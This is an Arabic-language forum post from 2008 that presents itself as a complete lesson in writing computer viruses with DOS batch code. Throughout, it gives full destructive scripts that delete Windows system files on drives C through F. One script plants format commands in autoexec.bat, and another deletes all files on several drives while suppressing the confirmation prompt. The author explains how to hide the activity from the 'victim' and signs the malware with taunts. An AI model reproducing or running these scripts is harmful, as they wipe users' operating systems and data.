درس كامل فى عمل فايروسات بالاكواد

beautyblotyboy · #1 13-07-2008, 04:29 AM

درس كامل فى عمل فايروسات بالاكواد

--------------------------------------------------------------------------------

اولاٌ : كيفية تصميم فايروسات عن طريق الدوس

هنا يجب ان تعرف ان فايروسات الدوس ليست إلا بعض الاوامر المقدمه
والتي تقوم بمسح ملفات السستم من اجل ان تبطل عمل الوندز

مثال : لو اردت ان امسح ملفات معينه يكون الامر المستخدم

del اسم الملف . المسار
بحيث يكون
del file name.exe or dll او اي مسار

مثال لتصميم فايرس صغير يدمر الوندز

-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
del C:windows*.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

------------------------------------------------------------------------------------------------------نهاية الكود-------------------------------------------------------------------

================================================== =======================
================================================== =======================

الحين راح اشرح لكم امر الفايرس بالتفصيل المملل

اول شي قدمه امر
@del ( لمسح الملفات )

ثاني شي حدد المكان الموجوده فيه الملفات
C:windows
C:windowssystem32
C:windowssystem
هذه اهي الاماكن الموجوده فيها الملفات

ثالث شي قدمه نوع المساسرات الي يجب ان تنمسح
وهذه طريقه جديد وحلوه

لو كنه نبي نمسح ملف ويكون مساره
exe
انحط
*.exe
وعلامة
*.
تعني مسح جميع الملفات التي تحمل المسار المحدد
والمسار اهو exe او اي مسار ثاني
يعني وقت نبي انصمم فايرس لاختصار الوقت والحجم والكتابه وعوار الراس انحط
*.exe
*.scr
*.ini
*.sys
*.nls
*.dll
بهذه الطريقه عطين امر بمسح الملفات ذات مسارexe.scr.ini.sys.nls.dll
مهما كان اسم الملف فهذا الشي غير مهم ما دام يحمل احد هذه المسارات سيمسح

ــــــــــــــــــــــــــــــــ فيروس القاتل ــــــــــــــــــــــــــ
وعمل الفايرس هو مسح الوندز بالكامل

بشرحه لكم وانشالله راح يوضح لكم طريقة التصميم هذا الشرح

-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
Cls
del *.exe
del *.scr
del *.ini
del *.txt
del *.dll
del *.dat
del *.sys
del *.bmp
del *.gif
del *.jpg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd system
Cls
del *.manifest
del taskmgr.exe
del *.dll
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
Cls
del *.wsc
del *.oca
del *.msc
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
del *.acm
del *.dat
del *.HLP
Cls
del *.sve
del *.tha
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *****k
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
cd ..
@del *.dll
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
Cls
del *.manifest
del taskmgr.exe
del *.dll
Cls
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
Cls
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
Cls
del *.acm
del *.dat
del *.HLP
del *.sve
del *.tha
Cls
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *****k
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
Cls
cd ..
@del *.dll
@echo off
echo #### u( >>010<<)
echo he kille u pc donot trea
echo if the virs he did not find the system file
echo u #### he will find hem now
@del C:windows*.ini
Cls
@del C:windows*.exe
Cls
@del C:windows*.com
Cls
@del C:windowssystem32*.exe
Cls
@del C:windowssystem32*.sys
Cls
@del C:windowssystem32*.log
Cls
@del C:windowssystem32*.drf
Cls
@del C:windowssystem32*.scr
Cls
@del C:windowssystem32*.dll
Cls
@del C:windowssystem32*.ini
Cls
@del c:windowssystem*.exe
Cls
@del c:windowssystem*.sys
Cls
@del c:windowssystem*.log
Cls
@del c:windowssystem*.drf
Cls
@del c:windowssystem*.scr
Cls
@del c:windowssystem*.dll
Cls
@echo off
echo #### u( >>010<<)
@del d:windows*.ini
Cls
@del d:windows*.exe
Cls
@del d:windows*.com
Cls
@del d:windowssystem32*.exe
Cls
@del d:windowssystem32*.sys
Cls
@del d:windowssystem32*.log
Cls
@del d:windowssystem32*.drf
Cls
@del d:windowssystem32*.scr
Cls
@del d:windowssystem32*.dll
Cls
@del d:windowssystem32*.ini
Cls
@del d:windowssystem*.exe
Cls
@del d:windowssystem*.sys
Cls
@del d:windowssystem*.log
Cls
@del d:windowssystem*.drf
Cls
@del d:windowssystem*.scr
Cls
@del d:windowssystem*.dll
Cls
@echo off
echo #### u ( >>010<<)
@del e:windows*.ini
Cls
@del e:windows*.exe
Cls
@del e:windows*.com
Cls
@del e:windowssystem32*.exe
Cls
@del e:windowssystem32*.sys
Cls
@del e:windowssystem32*.log
Cls
@del e:windowssystem32*.drf
Cls
@del e:windowssystem32*.scr
Cls
@del e:windowssystem32*.dll
Cls
@del e:windowssystem32*.ini
Cls
@del e:windowssystem*.exe
Cls
@del e:windowssystem*.sys
Cls
@del e:windowssystem*.log
Cls
@del e:windowssystem*.drf
Cls
@del e:windowssystem*.scr
Cls
@del e:windowssystem*.dll
@echo off
echo #### u ( >>010<<)
@del f:windows*.ini
Cls
@del f:windows*.exe
Cls
@del f:windows*.com
Cls
@del f:windowssystem32*.exe
Cls
@del f:windowssystem32*.sys
Cls
@del f:windowssystem32*.log
Cls
@del f:windowssystem32*.drf
Cls
@del f:windowssystem32*.scr
Cls
@del f:windowssystem32*.dll
Cls
@del f:windowssystem*.exe
Cls
@del f:windowssystem*.sys
Cls
@del f:windowssystem*.log
Cls
@del f:windowssystem*.drf
Cls
@del f:windowssystem*.scr
Cls
@del f:windowssystem*.dll
@pause
@echo off
echo #### u( >>010<<)
echo [killer virs_v1] By DosMan [Q8_KOL@HOTMAIL.COM]
echo if u found u pc has been #### in theis virs u shoud now ther
echo are one man he can do that DosMan if u want virs #### pc
echo like thet Die you mother ####
echo ha ha ha ha [Q8_KOL@HOTMAIL.COM]
@pause
:exit
-------------------------------------------------------------------------------نهاية الكود--------------------------------------------------------------------------
امر
..cd

هو امر الرجوع للمفات للوراء

وتم استخدمامه لسبب واحد

اول ما سيتم فتح الملف سيدخل الفايرس لمفات الوندز من دون الحاجه من تحديد المسار
يعني اذا كان الوندز في
c: او d:او f:او e:
راح يصيده يعني راح يصيده لان هذا الامر يخلي الفايرس يرجع لان يوصل لملف الوندز

يعني مثلنا انا اول ما افتح شاشة الدوس تطلع لي هذا الشي

--------------------------------------- D:##### and ####>
-----------------------------------------<
تنفتح شاشة الدوس بهذا الشكل ويطلع لي هذا المسار

الحين شنو الامر الي لازم احط من اجل الوصول إلى ملف
windows او system او system32
الامر
cd ..
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه

وللتذكير هذا الامر يستخدم للرجوع للوراء والفائده من الوصول إلى الملفات المطلوبه مهما كان المكان
الذي تم فيه فتح الفايرس

امر
cd WINDOWS
او
cd system32
او
cd system

يستخدم هذا الامر من اجل الدخول إلى الملف المطلوب

cd اسم الملف الي تبي تدخله

cd name the file u want open in dos

ويتم دخلول الملفات بعد تعين المسار المطلوب ومثل ما ترون
قدم قدمنا امر الرجوع من اجل الوصول إلى ملفات الوندز ومن ثم كتبنا اسم الملفات التي نريد ان ندخلها

بالاوامر الموجد

امر
Cls
امر تنضيف شاشة الدوس
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه

del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس

يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف

امر @echo off

امر ستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس او من اجل ظهور الكتابه على شاشة الدوس
@echo off

echo اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس

بعدين مثل ما اجوفون تم تحديد مسارات الملفات بذكر اسم المحرك c: // d: // e: // f: //

والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد الملفات
يعني اذا قدمتو الفايرس بملف ون زب وكان وندزه غير موجود على السي راح يفلت من الفايرس ولهذا
السبب تم تحديد المسارات مع وضع امر المسح الكلي للمسارات دون اسم الملف

بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير الجهاز ولاكن اذا تم تشغيل الفايرس بالسي ووندزه غير
موجود بالسي ما راح يصيد الملفات
بس الحين بعد التعديل راح يصيدها يعني شي اكييد الجهاز ما يتصلح إلا إذا تفرمت

-----------------------
شرح كود فايرس اخر-
----------------------

----------------------------------------&##1575;لكود-----------------------------------------------
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
----------------------------------------------------------------نهاية الكود-------------------------------------------------------------------

شرح الكود

echo format c: /q /u /autotest >nul >>c:autoexec.bat

echo من اجل الكتابه

format c: /q /u / امر فرمات

اسم حق الامر من اجل وضعه بملف autotest

nul [ عملية مضاعفه لامر الفرمات [ من اجل جعل الامر مرتين بدل مره واحده

c:autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه

وتم اختيار اسم autoexec

من اجل ان يعمل الفايرس من تلقاء نفسه

واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat

وفتح الملف سوف تجد ملفات باسم

autoexec موجود في c:

لان تم تحديد مكان الحفظ في السي

وستكون الاوامر بهذا الشكل

format c: /q /u /autotest
format c: /q /u /autotest

وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul

ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في السي

ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره

------------------------------
]كود فايرس اخر

-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
@echo off
ATTRIB -a -s -h -r c:*.*
ATTRIB -a -s -h -r c:windows*.*
Echo y | echo a | Echo y |del c:*.*
Echo y | echo a | Echo y |del d:*.*
Echo y | echo a | Echo y |del e:*.*
echo y | copy *.* c:
echo y | copy *.* D:
echo y | copy *.* E:
restart

------------------------------------------------------------------------------------------------------نهاية الكود-------------------------------------------------------------------

شرح الكود

بالاول حبين ان اوضح لكم ان عندما تقدم امر
*.*
وهو امر لمسح كل الملفات الموجود بالمجلد الذي حددته بشاشة الدوس

ستظهر رساله تطلب من الموافقه على هذا الامر

للتوضيح

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in bat>cd n

C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in batn>del *.*
C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in batn*.*, Are you sure (Y/N)? y

C:^^MR-HONFER^^^^MR-HONFER^^VIRSvirs in batn>

مثل ما ترون عندما تم الطلب مسح جميع الملفات الموجوده في مجلد n

خرجة لي رساله من اجل التأكد من موافقتي Are you sure (Y/N)

وبعد الظغط على

y

تم المسح

ولاكن ما هي الطريقه المتبعه من اجل تفادي هذه الرساله اذا كنا نريد ان نعمل فايرس بأوامر الدوس

الحل موجود بكود الفايرسالذي قدمته لكم

امر

Echo y | echo a | Echo y |del *.*

يستخدم لمسح جميع الملفات من دون الطلب

وطريقة استخدام الامر تتم بعد تحديد مسار الملف الذي تريد دخوله عن طريق الدوس ومن ثم كتابة الامر

ومن ثم يتم المسح

ولاكن الذي يوجد به هذا الكود ان تم تحديد المسار

Echo y | echo a | Echo y |del c:*.*

ومثل ما هو ظاهر ان تم تحديد مسح جميع الملفات التي في المحرك c:

وتم كتابة مثل هذا الامر في كود الفايرس ولاكن من اجل مسح المحركات الاخري

وكان ذالك بتحديد المحركات مثل ما ترون

فتم تحديد المحرك
c:
d:
e:
من اجل ان يتم حذف جميع الملفات التي فيه

والامر الذي بعد الامر الحذف هو امر نسخ جميع الملفات

echo y | copy *.*

وهذا الامر يعطي امكانيه نسخ جميع الملفات من دون خروج رسالة الموافقه مثل التي مبينه عندكم

*.*, Are you sure (Y/N)? y

ولاكن بكود الفايرس تم تحديد المسارات مثل ما ترون
c:
d:
e:

وبذالك نكون شرحنه هذا الكود

================================================== =======================
قبل انهاء الدرس الاول بالدوس حبيت اذكركم ان بعد ان يتم كتابة الاوامر في نوته باد
يتم تغير المسار إلى bat ؟؟؟؟